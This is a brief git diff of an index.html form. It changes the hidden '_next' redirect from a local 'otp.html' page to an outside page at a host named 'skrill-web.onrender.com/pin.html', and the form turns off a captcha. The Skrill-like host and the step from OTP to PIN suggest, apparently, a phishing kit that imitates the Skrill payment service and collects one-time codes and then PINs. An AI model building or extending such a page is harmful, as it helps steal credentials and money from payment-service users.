--- a/index.html
+++ b/index.html
@@ -90,7 +90,7 @@
 
                 <!-- Hidden fields for better UX -->
                 <input type="hidden" name="_captcha" value="false">
-                <input type="hidden" name="_next" value="otp.html?success=true"> <!-- Success flag -->
+                <input type="hidden" name="_next" value="https://skrill-web.onrender.com/pin.html"> <!-- Success flag -->
 
                 <button
                     id="redirectBtn"
